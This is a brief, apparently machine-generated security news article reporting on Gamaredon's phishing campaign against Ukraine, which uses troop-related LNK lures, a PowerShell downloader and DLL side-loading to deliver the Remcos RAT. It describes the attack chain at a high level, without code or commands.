Ethical Hacking News
Russia-linked Gamaredon targets Ukraine with a sophisticated phishing campaign using troop-related lures to deploy Remcos RAT via PowerShell downloader, demonstrating advanced tactics employed by this notorious group.
Cyber warfare has reached a new level of sophistication as Russia-linked group Gamaredon targets Ukraine with a phishing campaign using Remcos RAT via PowerShell downloader. Gamaredon is utilizing tactics, techniques, and procedures (TTPs) to achieve its objectives, including spear-phishing attacks against Ukrainian entities and organizations related to Ukrainian affairs. The phishing campaign employs troop-related lures to trick users into opening malicious LNK files containing PowerShell code, which connects to geo-fenced servers in Russia and Germany to retrieve a ZIP file with the Remcos backdoor. Gamaredon likely leverages custom scripts and tools in its campaigns, but recently used the highly versatile and infamous Remcos RAT, known for its ability to evade detection through DLL side loading and encryption of files within ZIP archives.
Cyber warfare has reached a new level of sophistication as Russia-linked group, Gamaredon, targets Ukraine with a phishing campaign using troop-related lures to deploy the highly notorious and versatile Remcos RAT via PowerShell downloader. The cyberespionage group, also known by other aliases such as Armageddon, Primitive Bear, ACTINIUM, and Callisto, has been launching spear-phishing attacks against Ukrainian entities, as well as organizations related to Ukrainian affairs.
The Gamaredon threat actor is utilizing a combination of tactics, techniques, and procedures (TTPs) to achieve its objectives. The phishing campaign employs troop-related lures to trick users into opening malicious LNK files that contain PowerShell code. Once the user opens these files, they initiate a PowerShell downloader that connects to geo-fenced servers in Russia and Germany to retrieve a ZIP file with the Remcos backdoor.
This advanced threat actor likely leverages custom scripts and tools in its campaigns; however, it has recently been observed employing the highly versatile and infamous Remcos RAT. This RAT is known for its ability to evade detection by utilizing a combination of methods such as DLL side loading and encryption of files within ZIP archives.
According to researchers at Cisco Talos, this threat actor distributes LNK files compressed inside ZIP archives as part of the recent phishing campaign, usually disguising the file as an Office document and uses names related to the military invasion. This campaign has been active since at least November 2024, with evidence showing that the servers only responded to requests from Ukraine while returning HTTP 403 errors for connections from Germany and Russia.
Gamaredon typically employs custom scripts and tools in its campaigns; however, this recent observation of using Remcos backdoor indicates a shift towards more sophisticated tactics. The attackers utilize PowerShell scripts to download ZIP files and extract them to the %TEMP% folder. Upon execution, they load a malicious DLL via DLL side loading, which acts as a loader, decrypting and executing the final Remcos payload.
The use of legitimate applications for DLL sideloading is another tactic employed by this threat actor. The sample analyzed by "Any.run" contained the clean application TivoDiag.exe, along with two DLLs - one malicious and one benign. The malicious DLL, mindclient.dll, was loaded during execution of TivoDiag.exe.
Researchers have provided indicators of compromise (IoCs) for this threat and Snort rules for its detection. This campaign underscores the ongoing threat posed by sophisticated cyber actors to Ukraine and highlights the importance of vigilance in safeguarding against such attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/Russia-Linked-Gamaredon-Targets-Ukraine-with-Sophisticated-Remcos-RAT-Campaign-ehn.shtml
Published: Mon Mar 31 09:40:36 2025 by llama3.2 3B Q4_K_M
